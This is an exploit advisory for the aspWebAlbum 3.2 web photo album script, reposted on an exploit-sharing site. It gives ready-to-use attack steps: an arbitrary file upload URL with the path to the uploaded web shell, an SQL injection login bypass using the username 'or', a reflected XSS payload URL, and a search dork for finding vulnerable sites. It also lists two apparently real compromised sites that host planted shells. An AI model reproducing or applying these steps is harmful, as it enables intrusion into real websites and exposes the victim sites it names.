aspWebAlbum 3.2 Multiple Remote Vulnerabilities

🗓️ 10 Sep 2008 00:00:00Reported by e.wiZz!Type
zdt🔗 0day.today👁 19 Views
aspWebAlbum 3.2 Multiple Remote Vulnerabilities discovered by Alemin_Krali allowing arbitrary file upload exploit and admin bypass.
===============================================
aspWebAlbum 3.2 Multiple Remote Vulnerabilities
===============================================


#################################################################################################
                                                                                                #
#-#  Discovered by Alemin_Krali                                                                 #
                                                                                                #
#-#  aspWebAlbum 3.2                                                                            #
                                                                                                #
#-#  Script Download "http://www.fullrevolution.com"                                            #
                                                                                                #
#-#  aspWebAlbum 3.2 Single Site License  |  $60.00 : )                                         #
                                                                                                #
#-#  HomePage  al3m.blogspot.com                                                                #
                                                                                                #
                                                                                                #
#-#  Dork ? : album.asp?pic= .jpg cat=                                                          #
                                                                                                #
                                                                                                #
                                                                                                #
            #--#  1-Arbitrary File Upload Exploit [AspWebAlbum All Versions]                    #
                                                                                                #
http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name!                   #
                                                                                                #
and your shell adress:                                                                          #
                                                                                                #
http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp                #
                                                                                                #
                                                                                                #
ex:1                                                                                            #
http://www.assisteurope.net/album/categories/Beslan%202005/Memorials/pics/cyberspy.asp          #
                                                                                                #
ex:2                                                                                            #
http://peopleablaze.net/ClientData/1038/CustomApps/PhotoAlbum//album/categories/                #
Ablaze rally 9-24-06/pics/klasvayv.asp                                                          #
                                                                                                #
                                                                                                #
           #--#  2-Admin Bypass     [AspWebAlbum 3.2]                                           #
                                                                                                #
                                                                                                #
http://site.com/path/album.asp?action=login                                                     #
                                                                                                #
ASP/MS SQL Server login syntax                                                                  #
                                                                                                #
Username:'or'                                                                                   #
Password:anything                                                                               #
                                                                                                #
                                                                                                #
           #--# 3-Xss Vulnerability  [AspWebAlbum 3.2]                                          #
                                                                                                #
http://site.com/album/album.asp?action=summary&message=<script>alert('xss')</script>&from=login #
                                                                                                #
##################################################################################################




#  0day.today [2018-04-04]  #
10 Sep 2008 00:00Current
7.1High risk
Vulners AI Score7.1